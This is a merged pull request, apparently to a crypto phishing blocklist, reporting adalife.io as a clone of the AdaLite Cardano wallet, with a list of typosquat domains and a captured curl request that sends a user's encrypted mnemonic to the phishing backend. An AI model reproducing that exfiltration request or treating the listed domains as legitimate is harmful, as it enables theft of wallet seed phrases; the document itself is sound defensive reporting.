### PR TITLE
adalife.io - phishing

### PR DESCRIPTION
**Pull request by xdzurman**
adalife.io
Browser wallet phishing site
https://urlscan.io/result/01a56bfe-bf9e-42ec-8c66-60afbcc30845/

### CODE REVIEW

**Comment by xdzurman** [comment]
The original official site is http://adalite.io/. The adaliFe is a phishing clone.

**Comment by 409H** [comment]
Can you point to the network request that steals the keys and sends to the backend?

Also the infra is a little suspect

```
resolve,firstSeen,lastSeen,source,tags
adalife.io,2021-01-14 04:56:29,2021-01-15 21:28:48,riskiq,
adallte.io,2021-01-14 02:22:24,2021-01-15 17:02:02,riskiq,
adailte.io,2021-01-14 02:22:33,2021-01-15 16:13:13,riskiq,
adalite.pro,2021-01-14 03:21:45,2021-01-15 06:13:51,riskiq,
www.adallte.io,2021-01-14 04:56:29,2021-01-14 04:56:29,riskiq,
www.adalife.io,2021-01-14 04:56:28,2021-01-14 04:56:28,riskiq,
adalife.so,2020-12-10 15:14:55,2021-01-14 04:56:28,riskiq,
www.adaiite.io,2021-01-02 07:24:14,2021-01-14 04:56:28,riskiq,
adaiite.io,2020-12-10 15:15:00,2021-01-14 04:56:27,riskiq,
www.adalite.pro,2021-01-14 04:56:26,2021-01-14 04:56:26,riskiq,
www.adalife.so,2021-01-04 12:26:39,2021-01-14 04:56:20,riskiq,
ada-lite.io,2020-12-05 17:32:40,2021-01-13 13:43:33,riskiq,
www.ada-lite.io,2020-12-10 02:11:53,2021-01-04 12:27:59,riskiq,
www.adalite.so,2021-01-04 12:27:58,2021-01-04 12:27:58,riskiq,
adalite.so,2020-12-06 10:23:26,2021-01-01 13:44:37,riskiq,
adalite.org,2020-11-30 04:58:45,2020-11-30 04:58:45,riskiq,phishing|riskiq|blacklist
```

**Comment by xdzurman** [comment]
This is the request that gets sent to the backend if you log in with a mnemonic different than a demo mnemonic:

curl 'https://explorer2.adalife.io/api3/gdata' \
  -H 'Connection: keep-alive' \
  -H 'Pragma: no-cache' \
  -H 'Cache-Control: no-cache' \
  -H 'Accept: application/json' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36' \
  -H 'Content-Type: application/json' \
  -H 'Origin: https://adalife.io' \
  -H 'Sec-Fetch-Site: same-site' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Referer: https://adalife.io/' \
  -H 'Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,sk;q=0.7,cs;q=0.6' \
  --data-binary '{"ffatale":"U2FsdGVkX1+QslpLllHsDGkeiDKLEW+OUtN+i2h/Nxl/ROTCRNR0xYLc6c81B8mKBO0CVOybPVW9jIjiYl2sczDhz9byRt++qmwTlzzCTY0o3jYpprG3k5KfDl+hxCbYiDUGipNlc+7gX9KkX3cgOqNsIU9hcq7I6ZV7VYL+Ept16eg3+sswQRZ4Em+pIAzo/w2mDfXpFvyYLiglCyuAU5jXbVhIYGmURIKIsHNMdqmqrTymDzApOtJxC6oLr97cn0jCrWVke4EDSccL54oBt70QDoeIT1wc/+TzXu2xG6oP+kfJoHBEUXfexjZjL4yYU1Xvt0AEdnWU/8FJD1omiwBqY8uldWBm2fQvp19nLrEvA6R+xCFSGG9GXweNmJJ6hCs2h1YdQ921gYY7KnUD0QeqAMV/XFGfZvqD//aydi4="}' \
  --compressed

the 'ffatale' is the hashed mnemonic,
here's their code
image

**Comment by xdzurman** [comment]
And yes, the other urls are also a clone of this. Basically, everything different than adalite.io is a scam. @409H

**Comment by xdzurman** [comment]
@409H Do you need any more info?

**Pull request merged**
